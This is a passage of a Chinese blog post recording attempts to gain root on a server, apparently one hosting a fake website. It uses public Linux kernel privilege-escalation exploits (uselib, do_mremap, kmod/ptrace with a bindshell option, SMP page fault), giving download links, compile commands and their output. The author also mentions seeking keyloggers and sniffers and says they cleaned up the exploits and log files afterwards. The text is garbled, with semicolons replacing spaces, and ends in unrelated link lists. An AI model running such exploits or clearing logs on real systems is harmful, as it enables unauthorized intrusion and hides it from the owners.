http://isec.pl/vulnerabilities/isec-0021-uselib.txt
文件:
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&q=p3
测试:
gcc;-O2;-fomit-frame-pointer;elflbl_v108.c;-o;elflbl_v108;
elflbl_v108.c:;In;function;`check_vma_flags’:;
elflbl_v108.c:545:;warning:;deprecated;use;of;label;at;end;of;compound;statement;
./elflbl_v108;
child;1;VMAs;0;
[ ];moved;stack;bff73000,;task_size=0xc0000000,;map_base=0xbf800000;
[ ];vmalloc;area;0xc7c00000;-;0xcf707000;
Wait...;-Segmentation;fault;
gcc;-O2;-fomit-frame-pointer;elflbl_v109.c;-o;elflbl_v109;
./elflbl_v109;
[ ];SLAB;cleanup;
[-];FAILED:;get_slab_objs:;/proc/slabinfo;not;readable?;(No;such;file;or;directory);
sh:;line;9:;24080;Killed;;;;;./elflbl_v109;
(3)Linux内核本地整数溢出和内存泄露漏洞
fun;with;linux;kernel
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7269&keyword=
http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
测试:
gcc;-o;vc;vc_resize.c;
./vc_resize;
open:;No;such;device;or;address;
gcc;memory_leak.c;-o;memory_leak;
memory_leak.c:80:2:;warning:;no;newline;at;end;of;file;
(4)Linux;Kernel;do_mremap;VMA本地权限提升漏洞
Linux;kernel;do_mremap;VMA;limit;local;privilege;escalation
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=6102&keyword=提升
http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
文件:
http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c
测试:
gcc;-O3;-static;-fomit-frame-pointer;mremap_pte.c;-o;mremap_pte;
./mremap_pte;
[ ];kernel;2.4.20-021stab022.11.777-enterprise;vulnerable:;YES;exploitable;YES;
MMAP;#65530;0x50bfa000;-;0x50bfb000;
[-];Failed;
(5)Linux;Kernel;kmod/ptrace竞争条件权限提升漏洞
linux;kmod/ptrace;bug;-;details
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4570&keyword=提升
http://marc.theaimsgroup.com/?l=bugtraq&m=104811209231385&w=2
文件:
http://august.v-lo.krakow.pl/~anszom/km3.c
测试:
gcc;-o;km3;km3.c;
./km3;?;
Usage:;./km3;[-d];[-b];[-r];[-s];[-c;executable];
-d;;;;;--;use;double-ptrace;method;(to;run;interactive;programs);
-b;;;;;--;start;bindshell;on;port;4112;
-r;;;;;--;support;randomized;pids;
-c;;;;;--;choose;executable;to;start;
-s;;;;;--;single-shot;mode;-;abort;if;unsuccessful;at;the;first;try;
./km3;-s;
Linux;kmod; ;ptrace;local;root;exploit;by;
=〉;Simple;mode,;executing;/usr/bin/id;〉;/dev/tty;
sizeof(shellcode)=95;
=〉;Child;process;started..........;
Failed;
(6)Linux;Kernel;i386;SMP页错误处理器特权提升漏洞
Linux;kernel;i386;SMP;page;fault;handler;privilege;escalation
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7338
http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
测试:
gcc;-o;smp;smp.c;
./smp;
[ ];in;thread;1;(pid;=;5400);
[ ];in;thread;2;(pid;=;5401);
[ ];rdtsc;calibration:;53428;
[ ];exploiting;race,;wait...;
[-];unable;to;exploit;race;in;30s,;
kernel;patched;or;load;too;high.;
尝试多个本地提权均未能成功!很郁闷!而在测试过程的时候,虚假网站已经被关闭了,虽然文件还在,但是很明显官方已经作了努力,并得到了不错的结果 。
6、其他
找了几个linux的键盘记录,都要root权限 。而服务器远程连接使用的ssh的,使用sniffer也估计没戏,所以暂时也没什么思路,清理exp、日志文件 。
以上是我的一些测试的结果,结果也没有拿到root,不过我整理了一下相关的漏洞,希望对大家以后有些帮助 。在站长群里发布了相关的结果,也没有人回话,不知道大家是太忙 。。。
推荐阅读
- 中国银行手机银行怎么查卡号
- 中国银行手机银行怎么转账
- 中国银行手机银行怎么查开户行
- 关于V188虚假信号,打不出接不到的问题
- 一条虚假的静态默认路由
- 路由表问题引起故障 虚假的静态默认路由
- 执行中发现虚假诉讼怎么办
- 什么是虚假同感偏差?
- 中国银行中午休息吗
- 虚假合同是无效合同吗